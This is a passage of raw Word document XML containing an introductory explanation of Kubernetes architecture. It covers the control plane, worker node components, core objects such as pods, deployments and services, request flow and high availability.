          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>master node</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>control plane</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is the heart of a Kubernetes cluster. It manages the cluster's state, makes decisions (e.g., scheduling), and monitors the cluster's health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412B592" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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lastRenderedPageBreak/>
        <w:t>Components of the Master Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC98A7"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API Server (kube-apiserver)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200906D4"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Serves as the frontend for the Kubernetes control plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557A36C"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Exposes REST APIs for interaction with the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2526BF"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All interactions with Kubernetes, like creating resources (pods, services, etc.), go through the API server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C5649"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Controller Manager (kube-controller-manager)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559713BF"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Ensures the desired state of the cluster is maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD6F70"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Monitors the state of resources and makes adjustments (e.g., pod restarts, scaling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08E87E"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Manages </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replica controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deployment controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful set controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CBE438"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Scheduler (kube-scheduler)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF05E6"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Assigns workloads (pods) to nodes based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91FBF6"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Chooses which node a pod should run on based on factors like resource requirements and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BB0B4"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etcd</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636ED43"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Distributed key-value store used for persistent storage of the cluster's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439178E"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Stores cluster configurations and metadata (e.g., pods, nodes, secrets, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4971F0"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Highly available and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4C560" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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C419A5D">
          <v:rect id="_x0000_i3407" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34CEC4" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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2. Worker Node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECF557"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Worker nodes are the machines (either virtual or physical) that run the containers. They host the pods, which are the smallest deployable units in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CF706" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Components of a Worker Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED9B03"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Kubelet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60A944"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An agent running on each node, ensuring the containers inside the pods are running as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A741D"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Communicates with the master node to report the node's health and status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C555147"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Kube Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BFB58"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Maintains network rules that allow communication between pods, services, and external clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C861DD5"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Provides load balancing to distribute network traffic across available pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70335D6D"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Container Runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9411E9"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Software responsible for running containers (e.g., Docker, containerd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34800677"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Executes containers inside the pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84CF95"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Pods</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C647E"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The smallest unit of execution in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447F5B0"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pod</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can contain one or more containers (typically a single container, but multi-container pods are useful in some cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A93874" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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BCBEA3A">
          <v:rect id="_x0000_i3408" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E799F9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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3. Kubernetes Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0ACB82"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These are the resources Kubernetes uses to manage and control applications and workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E2333"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Pod</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The smallest unit of deployment. A pod can hold one or more containers that share the same network namespace and storage volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0947CC"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ReplicaSet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that a specified number of pod replicas are running at any given time. Used to scale pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32144902"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Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages a set of replica sets and provides declarative updates for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F419AC8"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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes a set of pods as a network service. Kubernetes services provide load balancing and stable network endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBC852"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Ingress</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages external access to services, typically HTTP, and provides URL routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0A736" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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8E5AA6E">
          <v:rect id="_x0000_i3409" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BB004" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Kubernetes Control Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC446C"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User Interaction</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39BB35"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A user interacts with the Kubernetes cluster via the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kubectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> command-line tool or the Kubernetes API server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF8DD0"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API Server</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758028D2"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The API server processes requests and sends them to the appropriate components (such as the scheduler, controller manager, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AAEC56"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Scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48397662"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The scheduler determines which node should run the new pods based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F70F4"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Controller Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D3B4D"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The controller manager ensures that the desired state of the cluster is achieved (e.g., ensuring the right number of replicas for a pod).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778B9B5"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lastRenderedPageBreak/>
        <w:t>Kubelet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79528E"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The kubelet on each worker node makes sure the correct pods are running on the node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626110E3"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Kube Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1C5AF"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Kube proxy handles networking and manages the load balancing of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A998FA8"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Pod and Container</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00290C02" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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The containers in the pods run the application workloads as defined in the deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE5263" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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DC8256F">
          <v:rect id="_x0000_i3410" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B7982" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Kubernetes Cluster Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F213469"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The API server</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives requests from users (via kubectl or other tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4853A"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API server</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> communicates with </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>etcd</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store or retrieve configuration data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7B6D2"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> decides on the placement of pods on nodes based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D6B55"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kubelet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on worker nodes runs the actual containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B7BF1"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Kube proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures network communication between pods, services, and the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE7AC8" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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510D9C">
          <v:rect id="_x0000_i3411" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A92745" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Kubernetes High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72544905"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To achieve high availability, Kubernetes is typically deployed with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682458C"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Multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>master nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (control plane) for redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB2C1BB"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etcd</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is replicated to ensure fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF13C6"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Worker nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> spread across different zones or regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66820C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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A83DDEE">
          <v:rect id="_x0000_i3412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97EE82" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Kubernetes Architecture Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A5DDA6"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Here is a simplified diagram of the Kubernetes architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77C8D9" w14:textId="4388E651"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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F87921" wp14:editId="4320B10D">
            <wp:extent cx="3847698" cy="2385392"/>
            <wp:effectExtent l="57150" t="57150" r="95885" b="91440"/>
            <wp:docPr id="2048906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906830" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3850923" cy="2387391"/>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6AB4CF6D" w14:textId="734C3AC7" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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FE5DF83">
          <v:rect id="_x0000_i3413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0FA41" w14:textId="77777777" w:rsidR="00767845" w:rsidRPr="009D1D6F" w:rsidRDefault="00767845" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
